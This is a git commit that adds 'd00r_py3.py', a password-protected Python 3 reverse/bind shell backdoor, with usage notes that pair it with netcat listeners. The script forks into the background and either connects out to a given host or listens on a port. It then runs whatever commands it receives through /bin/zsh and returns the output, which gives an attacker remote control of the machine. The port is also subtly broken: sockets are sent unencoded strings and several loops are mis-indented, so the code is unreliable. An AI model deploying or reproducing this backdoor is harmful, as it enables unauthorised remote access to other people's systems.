reviewe d00r.py run with python3

2024-11-24 20:23:04 +00:00 · 2014-03-12 16:13:12 +08:00 · 2014-03-12 16:13:12 +08:00 · c434ce4e8a
commit c434ce4e8a
parent a74f33e342
1 changed files with 135 additions and 0 deletions
--- a/py/d00r_py3.py
+++ b/py/d00r_py3.py
@ -0,0 +1,135 @@
+#!/usr/bin/env python3
+
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
+#   d00r.py 0.3a (reverse|bind)-shell in python by fQ	#
+#							#
+#	alpha						#
+#							#
+#   Reviewed By:tennc                                   #
+#   date:2014-03-12                                     #
+#   run with python3                                    #
+#							#
+# usage: 						#
+# 	% ./d00r_py3 -b password port			#
+#	% ./d00r_py3 -r password port host		#
+#	% nc host port					#
+#	% nc -l -p port (please use netcat)		#
+# # # # # # # # # # # # # # # # # # # # # # # # # # # #	#
+
+
+import os, sys, socket, time
+
+
+# =================== var =======
+MAX_LEN=1024
+SHELL="/bin/zsh -c"
+TIME_OUT=300 #s
+PW=""
+PORT=""
+HOST=""
+
+
+# =================== funct =====
+# shell - exec command, return stdout, stderr; improvable
+def shell(cmd):
+    sh_out = os.popen(SHELL + " " + cmd).readlines()
+    nsh_out = ""
+    for i in range(len(sh_out)):
+        nsh_out += sh_out[i]
+        return nsh_out
+
+# action?
+def action(conn):
+    conn.send("\nPass?\n")
+    try:
+        pw_in = conn.recv(len(PW))
+    except:
+        print("timeout")
+    else:
+        if pw_in == PW:
+            conn.send("joo are on air!\n")
+            while True:
+                conn.send(">>> ")
+                try:
+                    pcmd = conn.recv(MAX_LEN)
+                except:
+                    print("timeout")
+                    return True
+                else:
+                    #print("pcmd:",pcmd)
+                    cmd = "" #pcmd
+                    for i in range(len(pcmd) - 1):
+                        cmd += pcmd[i]
+                        if cmd == ":dc":
+                            return True
+                        elif cmd == ":sd":
+                            return False
+                        else:
+                            if len(cmd) > 0:
+                                out = shell(cmd)
+                                conn.send(out)
+# =================== main ======
+argv = sys.argv
+
+if len(argv) < 4:
+    print("usage:")
+    print("% ./d00r_py3 -b password port")
+    print("% ./d00r_py3 -r password port host")
+    print("% nc host port")
+    print("% nc -l -p port (please use netcat)")
+    sys.exit(1)
+elif argv[1] == "-b":
+    PW = argv[2]
+    PORT = argv[3]
+elif argv[1] == "-r" and len(argv) > 4:
+    PW = argv[2]
+    PORT = argv[3]
+    HOST = argv[4]
+else:
+    exit(1)
+
+PORT = int(PORT)
+print("PW:",PW,"PORT:",PORT,"HOST:",HOST)
+
+#sys.argv[0] = "d00r_py3"
+
+#exit ffather proc
+
+if os.fork()!= 0:
+    sys.exit(0)
+
+#associate the socket
+sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+sock.settimeout(TIME_OUT)
+
+if argv[1] == "-b":
+    sock.bind(("localhost",PORT))
+    sock.listen(0)
+
+run = True
+while run:
+    if argv[1] == "-r":
+        try:
+            sock.connect((HOST,PORT))
+        except:
+            print("host unreachable")
+            time.sleep(5)
+        else:
+            run = action(sock)
+    else:
+        try:
+            (conn,addr) = sock.accept()
+        except:
+            print("timeout")
+            time.sleep(1)
+        else:
+            run = action(conn)
+    if argv[1] == "-b" :
+        conn.shutdown(2)
+    else:
+        try:
+            sock.send("")
+        except:
+            time.sleep(1)
+        else:
+            sock.shutdown(2)